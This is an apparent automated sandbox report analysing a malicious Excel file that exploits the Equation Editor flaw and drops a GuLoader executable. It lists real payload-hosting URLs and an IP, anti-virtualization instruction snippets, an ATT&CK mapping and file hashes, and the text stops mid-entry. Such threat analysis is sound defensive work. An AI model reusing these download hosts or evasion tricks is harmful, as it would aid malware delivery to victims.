              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C42D3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C37F2
              Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003CA021 second address: 00000000003CA078 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 53673179h 0x00000007 sub eax, 2CF91FC3h 0x0000000c xor eax, 4DAF12BEh 0x00000011 sub eax, 6BC10307h 0x00000016 cpuid 0x00000018 jmp 00007F767C7D7CDEh 0x0000001a pushad 0x0000001b rdtsc
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3427 rdtsc
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316Thread sleep time: -360000s >= -30000s
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C3427 rdtsc
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C482B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003CAA61 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C68D1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C9CCF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C9321 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C479E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C37F2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003C47D2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmpBinary or memory string: !Progman

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery41Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery32VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Booking Confirmation.xlsx26%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%AviraHEUR/AGEN.1134908
              C:\Users\Public\vbc.exe100%AviraHEUR/AGEN.1134908
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe29%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe9%ReversingLabsWin32.Malware.Generic
              C:\Users\Public\vbc.exe29%VirustotalBrowse
              C:\Users\Public\vbc.exe9%ReversingLabsWin32.Malware.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1134908Download File
              4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1134908Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://103.155.82.236/nrsdoc/svchost.exe0%Avira URL Cloudsafe
              https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://103.155.82.236/nrsdoc/svchost.exetrue
              • Avira URL Cloud: safe
              unknown
              https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bintrue
              • Avira URL Cloud: malware
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.day.com/dam/1.0F7B97C3D.emf.0.drfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                103.155.82.236
                unknownunknown
                134687TWIDC-AS-APTWIDCLimitedHKtrue

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:433966
                Start date:14.06.2021
                Start time:08:52:50
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 13s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Booking Confirmation.xlsx
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLSX@4/17@0/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 16.5% (good quality ratio 5.3%)
                • Quality average: 16%
                • Quality standard deviation: 27.1%
                HCA Information:Failed
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • TCP Packets have been reduced to 100
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                08:54:08API Interceptor67x Sleep call for process: EQNEDT32.EXE modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                103.155.82.236BL_SGN11203184.xlsxGet hashmaliciousBrowse
                • 103.155.82.236/fksdoc/svchost.exe
                spices requirement.xlsxGet hashmaliciousBrowse
                • 103.155.82.236/fksdoc/svchost.exe
                2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                • 103.155.82.236/fwkdoc/svchost.exe
                DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                • 103.155.82.236/fwkdoc/svchost.exe

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                TWIDC-AS-APTWIDCLimitedHKBL_SGN11203184.xlsxGet hashmaliciousBrowse
                • 103.155.82.236
                spices requirement.xlsxGet hashmaliciousBrowse
                • 103.155.82.236
                Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                • 103.155.92.95
                Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                • 103.155.92.95
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 103.155.93.93
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 103.155.93.93
                2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                • 103.155.82.236
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185
                Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                • 103.155.92.221
                Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                • 103.155.92.221
                DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                • 103.155.82.236
                Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                • 103.155.92.221
                Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                • 103.155.92.221
                PO (2).exeGet hashmaliciousBrowse
                • 103.153.182.50
                PO.exeGet hashmaliciousBrowse
                • 103.153.182.50
                Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185
                Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                • 103.155.93.185

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):147456
                Entropy (8bit):5.822963661672907
                Encrypted:false
                SSDEEP:1536:zK7pvMMhAYlnYgtuELhUQwe6KjEw5bMNccnuMG5reMFbCJQ:zCBqg197dvjEw5yccw5r7d
                MD5:EE83942376EA5717149517FCC832AB9F
                SHA1:EC75B10C6EF046CB63EAA20470AC94529FB4873A
                SHA-256:B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC
                SHA-512:431CDD7E43FD6A4C4DF862297EEBC42E9CB68909647B57288A63BFE036D9D0560CC0E97D759BDA096E1389E3CD18D243E627CCE692660E2A384BE430623B2551
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Author: Joe Security
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Virustotal, Detection: 29%, Browse
                • Antivirus: ReversingLabs, Detection: 9%
                Reputation:low
                IE Cache URL:http://103.155.82.236/nrsdoc/svchost.exe
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...@.`R.....................0............... ....@..........................P.......X..........................................(....@..0...................................................................(... ....................................text............................... ..`.data...x.... ....... ..............@....rsrc...0....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B15974F.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):51166
                Entropy (8bit):7.767050944061069
                Encrypted:false
                SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2376BB51.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):51166
                Entropy (8bit):7.767050944061069
                Encrypted:false
                SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\539A36D9.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                Category:dropped
                Size (bytes):8815
                Entropy (8bit):7.944898651451431
                Encrypted:false
                SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                MD5:F06432656347B7042C803FE58F4043E1
                SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60C1A490.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):79394
                Entropy (8bit):7.864111100215953
                Encrypted:false
                SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                MD5:16925690E9B366EA60B610F517789AF1
                SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE09D1A.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):49744
                Entropy (8bit):7.99056926749243
                Encrypted:true
                SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                Malicious:false
                Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):7592
                Entropy (8bit):5.451630657563872
                Encrypted:false
                SSDEEP:96:zngF+cqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:b6lSTxK/LA/FVoL3QtKhn+e3+wi
                MD5:7D10A02D1CE6CBECF621A557AC6242DF
                SHA1:42E4CE1D7D07F9956CD22417969C8B62534C97BC
                SHA-256:11F1CDF0935334F53514E4B8CA4E096BBF56505458DD8FAC77EBEE917DF7BF13
                SHA-512:8F87BBD14F97BE4F22C2C3A76DF0F51A97819717353AA7D8D44C31125776CEF54CF5AC3CEBA51222BD16EB0D97AC4DA08923DD4F7B2CDE92607383F597957EF1
                Malicious:false
                Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d...........................'..t....\...............<...W..t.........6[v_..t.......t0K..DySw..R...............Pw..R.$.......d.......t...J^.t.... ^.tp.R...R.H.......-...$....<Ow................<..v.Z.v....X.]o....0K.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5867438.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):50311
                Entropy (8bit):7.960958863022709
                Encrypted:false
                SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                MD5:4141C7515CE64FED13BE6D2BA33299AA
                SHA1:B290F533537A734B7030CE1269AC8C5398754194
                SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                Malicious:false
                Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE03F06.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):79394
                Entropy (8bit):7.864111100215953
                Encrypted:false
                SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                MD5:16925690E9B366EA60B610F517789AF1
                SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                Malicious:false
                Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1192904.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):49744
                Entropy (8bit):7.99056926749243
                Encrypted:true
                SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
